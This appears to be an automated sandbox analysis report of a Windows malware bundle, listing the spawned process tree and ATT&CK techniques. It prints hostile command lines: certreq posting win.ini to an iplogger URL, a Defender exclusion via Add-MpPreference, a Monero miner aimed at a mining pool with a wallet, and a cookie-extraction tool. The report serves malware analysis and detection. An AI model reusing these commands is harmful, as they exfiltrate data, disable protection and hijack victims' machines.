C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
8⤵
PID:4520

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
9⤵
PID:7140

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
8⤵
PID:4484

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
9⤵
PID:5924

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
8⤵
PID:4952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
9⤵
PID:5452

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
9⤵
PID:4584

C:\Windows\SysWOW64\cmd.exe
cmd
10⤵
PID:5664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
8⤵
PID:752

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
8⤵
PID:4800

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
8⤵
PID:4456

C:\Users\Admin\AppData\Local\Temp\0eagzllrzvl\app.exe
"C:\Users\Admin\AppData\Local\Temp\0eagzllrzvl\app.exe" /8-23
6⤵
PID:3288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Red-Leaf"
7⤵
PID:5124

C:\Program Files (x86)\Red-Leaf\7za.exe
"C:\Program Files (x86)\Red-Leaf\7za.exe" e -p154.61.71.51 winamp-plugins.7z
7⤵
PID:6860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Red-Leaf\app.exe" -map "C:\Program Files (x86)\Red-Leaf\WinmonProcessMonitor.sys""
7⤵
PID:7068

C:\Program Files (x86)\Red-Leaf\app.exe
"C:\Program Files (x86)\Red-Leaf\app.exe" -map "C:\Program Files (x86)\Red-Leaf\WinmonProcessMonitor.sys"
8⤵
PID:5220

C:\Program Files (x86)\Red-Leaf\7za.exe
"C:\Program Files (x86)\Red-Leaf\7za.exe" e -p154.61.71.51 winamp.7z
7⤵
PID:6180

C:\Program Files (x86)\Red-Leaf\app.exe
"C:\Program Files (x86)\Red-Leaf\app.exe" /8-23
7⤵
PID:3928

C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:892

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:1516

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:3520

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4184

C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"
2⤵
- Executes dropped EXE
PID:4792

C:\ProgramData\5930241.65
"C:\ProgramData\5930241.65"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3024

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
4⤵
- Executes dropped EXE
PID:4176

C:\ProgramData\2232003.24
"C:\ProgramData\2232003.24"
3⤵
- Executes dropped EXE
PID:4984

C:\ProgramData\7028980.77
"C:\ProgramData\7028980.77"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2204

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
4⤵
PID:5376

C:\ProgramData\4743103.52
"C:\ProgramData\4743103.52"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4036

C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1728

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4424

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:6040

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:512

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A8F2098D0954EE1146E249050793BCC6 C
2⤵
- Loads dropped DLL
PID:3616

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1924

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:2872

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6708

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4272

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:4856

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{21c4e103-c9e5-4e4a-bf2f-7324ad6b7d63}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:1228

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
2⤵
PID:6488

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5168

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:5380

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:6848

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:7576

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3120

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4724

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6552

C:\Users\Admin\AppData\Local\Temp\12AF.tmp.exe
C:\Users\Admin\AppData\Local\Temp\12AF.tmp.exe
1⤵
PID:5844

C:\Users\Admin\AppData\Local\Temp\25BB.tmp.exe
C:\Users\Admin\AppData\Local\Temp\25BB.tmp.exe
1⤵
PID:8396

C:\Users\Admin\AppData\Local\Temp\25BB.tmp.exe
C:\Users\Admin\AppData\Local\Temp\25BB.tmp.exe
2⤵
PID:7720

C:\Users\Admin\AppData\Local\Temp\29F2.tmp.exe
C:\Users\Admin\AppData\Local\Temp\29F2.tmp.exe
1⤵
PID:10008

C:\Users\Admin\AppData\Local\Temp\3619.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3619.tmp.exe
1⤵
PID:10152

C:\Users\Admin\AppData\Roaming\iddecib
C:\Users\Admin\AppData\Roaming\iddecib
1⤵
PID:188

C:\Users\Admin\AppData\Local\Temp\3C54.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3C54.tmp.exe
1⤵
PID:4488

C:\Users\Admin\AppData\Local\Temp\4964.tmp.exe
C:\Users\Admin\AppData\Local\Temp\4964.tmp.exe
1⤵
PID:5460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
2⤵
PID:1940

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:7192

C:\Users\Admin\AppData\Local\Temp\4964.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\4964.tmp.exe"
2⤵
PID:7728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 2464
2⤵
- Program crash
PID:7824

C:\Users\Admin\AppData\Local\Temp\6EB0.tmp.exe
C:\Users\Admin\AppData\Local\Temp\6EB0.tmp.exe
1⤵
PID:10868

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:11224

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:10360

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6712

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:10840

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4572

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:11092

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5960

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3728

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6812

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7564

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7952

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7952 -s 1452
2⤵
- Program crash
PID:8208

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery

Security Software Discovery

T1063

Peripheral Device Discovery